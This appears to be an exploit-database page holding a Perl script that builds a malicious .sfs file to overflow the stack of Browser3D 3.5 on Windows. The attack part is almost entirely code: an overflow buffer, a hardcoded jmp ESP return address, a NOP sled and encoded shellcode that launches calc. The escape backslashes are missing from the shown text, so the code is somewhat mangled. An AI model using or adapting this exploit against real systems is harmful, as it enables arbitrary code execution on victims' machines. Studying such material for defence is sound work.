Browser3D 3.5 (.sfs File) Local Stack Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Browser3D 3.5 (.sfs File) Local Stack Overflow Exploit
# Published : 2009-01-22
# Author : AlpHaNiX
# Previous Title : Browser3D 3.5 (.sfs File) Local Stack Overflow Exploit (c)
# Next Title : Total Video Player 1.31 (DefaultSkin.ini) Local Stack Overflow Exploit

#!/usr/bin/perl
# By ALpHaNiX
# NullArea.Net
# THanks

system("color 5");

if (@ARGV != 1) { &help; exit(); }

sub help(){
	print "[X] Usage : ./exploit.pl filename n";
}

{ $file = $ARGV[0]; }
print "n [X]*************************************************n";
print " [X]Browser3D(.sfs file) Local Stack Overflow Exploit*n";
print " [X]        Coded By AlpHaNiX                        *n";
print " [X]         From Null Area [NullArea.Net]           *n";
print " [X]**************************************************nn";

print "[+] Exploiting.....n" ;

my $acc="x41" x 300 ;
# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub
http://metasploit.com
my $shellcode =
"x2bxc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13x5d".
"x7exf1x8cx83xebxfcxe2xf4xa1x96xb5x8cx5dx7ex7axc9".
"x61xf5x8dx89x25x7fx1ex07x12x66x7axd3x7dx7fx1axc5".
"xd6x4ax7ax8dxb3x4fx31x15xf1xfax31xf8x5axbfx3bx81".
"x5cxbcx1ax78x66x2axd5x88x28x9bx7axd3x79x7fx1axea".
"xd6x72xbax07x02x62xf0x67xd6x62x7ax8dxb6xf7xadxa8".
"x59xbdxc0x4cx39xf5xb1xbcxd8xbex89x80xd6x3exfdx07".
"x2dx62x5cx07x35x76x1ax85xd6xfex41x8cx5dx7ex7axe4".
"x61x21xc0x7ax3dx28x78x74xdexbex8axdcx35x8ex7bx88".
"x02x16x69x72xd7x70xa6x73xbax1dx90xe0x3ex7exf1x8c";
my $ret ="x1ax0fx46x77"  ; #  jmp ESP in Windows VISTA
my $nop ="x90" x 20 ;# some lame nops lol
my $exploit = $acc.$ret.$nop.$shellcode;
print "[+] Creating Evil File" ;
open($FILE, ">>$file") or die "Cannot open $file";
print $FILE $exploit;
close($FILE);
print "n[+] Please wait while creating $file";
print "n[+] $file has been created";

# www.Syue.com [2009-01-22]